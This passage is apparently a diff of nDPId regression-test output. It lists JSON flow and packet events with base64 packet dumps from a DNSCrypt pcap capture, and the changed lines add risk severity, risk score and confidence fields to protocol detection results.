 00694{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":129,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":946739305218,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":222,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":222,"pkt_l4_len":188,"ts_msec":946739305218,"pkt":"ZmZmZmZmRERERERECABFAADQ+LZAADgRZ2\/DHl4cCgAAASD7glkAvOtuMsuAAAABAAEAAAAAATINZG5zY3J5cHQtY2VydAVmZm11YwNuZXQAABAAAcAMABAAAQAADhAAfXxETlNDAAEAANu1cuNn82W5kyvuIYj3yDd11LkL534iAFDK9fBQA07jnu8CUEQwYJt1XxEE91D0YyFd2wLooVHv9yyAcc0SAAB5FL6yNLYbucmv1fHy4RsAcOv\/0XhGDt+qQ0bl\/YNRIXkUvrI0thu5ATQ9Gl8jB9hnnVXw"}
 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":130,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305219,"flow_last_seen":946739305219,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739305219,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":32970,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01135{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":130,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":946739305219,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739305219,"pkt":"REREREREZmZmZmZmCABFAAIciBpAAL0RGIYKAAABjgTMb4DKAbsCCB1KAhEBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANuczMCY2EFbHVnZ3MCY28AABAAAQAAAAAAAAAAAAHEAAwBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00682{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":130,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305219,"flow_last_seen":946739305219,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739305219,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":32970,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":130,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305219,"flow_last_seen":946739305219,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739305219,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":32970,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":131,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305219,"flow_last_seen":946739305219,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739305219,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":60962,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02418{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":131,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":946739305219,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739305219,"pkt":"REREREREZmZmZmZmCABFAAXciBwgAL0RNMQKAAABjgTMb+4iAbsGBKD1AgwBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANuczMCY2EFbHVnZ3MCY28AABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00686{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":131,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305219,"flow_last_seen":946739305219,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739305219,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":60962,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00795{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":131,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305219,"flow_last_seen":946739305219,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739305219,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":60962,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":132,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305219,"flow_last_seen":946739305219,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739305219,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":33071,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02418{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":132,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":946739305219,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739305219,"pkt":"REREREREZmZmZmZmCABFAAXciBsgAL0RNMUKAAABjgTMb4EvAbsGBA3nAg4BAAABAAAAAAABATINZG5zY3J5cHQtY2VydANuczMCY2EFbHVnZ3MCY28AABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00686{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":132,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305219,"flow_last_seen":946739305219,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739305219,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":33071,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00795{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":132,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305219,"flow_last_seen":946739305219,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739305219,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":33071,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00427{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":133,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739305219,"pkt":"REREREREZmZmZmZmCABFAABQiBwAub0RWZcKAAABjgTMbwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":133,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00427{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":134,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739305219,"pkt":"REREREREZmZmZmZmCABFAABQiBsAub0RWZgKAAABjgTMbwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":134,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":135,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305219,"flow_last_seen":946739305219,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739305219,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":43505,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01135{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":135,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":946739305219,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739305219,"pkt":"REREREREZmZmZmZmCABFAAIciB1AAL0RGIMKAAABjgTMb6nxAbsCCB1KAg8BAAABAAAAAAABATINZG5zY3J5cHQtY2VydANuczMCY2EFbHVnZ3MCY28AABAAAQAAAAAAAAAAAAHEAAwBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00682{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":135,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305219,"flow_last_seen":946739305219,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739305219,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":43505,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":135,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305219,"flow_last_seen":946739305219,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739305219,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":43505,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":136,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305219,"flow_last_seen":946739305219,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739305219,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":52284,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01135{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":136,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":946739305219,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739305219,"pkt":"REREREREZmZmZmZmCABFAAIciB5AAL0RGIIKAAABjgTMb8w8AbsCCB1KAg0BAAABAAAAAAABATINZG5zY3J5cHQtY2VydANuczMCY2EFbHVnZ3MCY28AABAAAQAAAAAAAAAAAAHEAAwBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00682{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":136,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305219,"flow_last_seen":946739305219,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739305219,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":52284,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":136,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305219,"flow_last_seen":946739305219,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739305219,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":52284,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":137,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305219,"flow_last_seen":946739305219,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739305219,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":46856,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02418{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":946739305219,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739305219,"pkt":"REREREREZmZmZmZmCABFAAXciB8gAL0RNMEKAAABjgTMb7cIAbsGBNgLAhABAAABAAAAAAABATINZG5zY3J5cHQtY2VydANuczMCY2EFbHVnZ3MCY28AABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA